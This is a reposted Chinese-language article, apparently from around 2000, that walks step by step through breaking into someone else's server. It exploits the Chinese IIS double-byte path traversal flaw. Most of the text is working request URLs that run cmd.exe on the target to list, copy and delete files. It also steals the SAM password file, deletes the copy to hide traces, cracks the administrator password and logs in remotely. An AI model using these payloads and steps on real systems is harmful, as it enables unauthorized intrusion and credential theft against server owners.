| 我攻破某主机的详细过程!(供大家参考)作者arnold |
|
| 我攻破某主机的详细过程!(供大家参考)作者arnold |
|
|
|
作者:佚名 文章来源:不详 点击数: 更新时间:2006-12-5 17:16:00  |
经本人测试,下面的方法确实可行,我整理此篇文章的时间是2000.10.29,测试时间是
近来安全类技术网站提得最多的技术漏洞莫过于 ? 的问题。
c1 1c,中文简体里面没有这种字,照正常的情况根据内码转换文件
\winnt\system32\c_936.nls会编码成“?”。但对中文简体版IIS中
c1 1c解码成了(c1-c0)*40 1c=5c=“\”。此编码发生在IIS检测处理路
径串中的“..\”之后,所以可以突破IIS路径访问到上级目录。此漏洞
从中文IIS4.0 SP6开始,还影响中文WIN2000 IIS5.0、中文WIN2000 IIS5.0
SP1,好像台湾繁体中文也受此漏洞影响。
执行:http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32
/cmd.exe?/c dir c:\发现列出了远程主机C:\下的所有文件,执行:
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c
copy c:\autoexec.bat c:\autoexec.bak 成功实现文件的复制,
执行:http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/
cmd.exe?/c del c:\autoexec.bak 成功实现文件的删除,哇!太利害了。
随便浏览了一下,因为是国内的主机,不想搞破坏,只想练练手!目的:
获得Administrator权限。
执行:http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/
cmd.exe?/c copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\
把sam._文件拷贝到wwwroot文件内,输入:http://xxx.xxx.xxx.xxx/sam._
将sam._文件下载到本地,执行:
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c
del c:\inetpub\wwwroot\sam._清除痕迹。
在本机执行:C:"gt;expand sam._ sam
启动l0phtcrack 2.5(可到http://rina.yofor.com/7index.html 下载),Import Sam File... 导入sam文件,Open Wordlist File...
打开一个字典,Run Crack,乖乖,要17个小时,不管它,让它慢慢破去,先睡个
觉先!五分钟后来一看,Administrator 的 Nt Password 居然是 123456,我昏,
网管们注意了,这种密码也可以取呀?执行:C:\"gt;newletmein \\xxx.xxx.xxx -admin
扫描主机,发现管理员ID是:asdfghjk,执行:C:\"gt;net use \\xxx.xxx.xxx.xxxc$
winnt\system32\logfiles 看了看,呵呵!写个E_mail给主机的网管说明了漏洞情况^^
|
| 文章录入:wuyongjian 责任编辑:wuyongjian |
|
上一篇文章: 如何进入一台UNIX主机
下一篇文章: 看看SQL是怎么一天内两次改换黑白的首页更新的 |
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
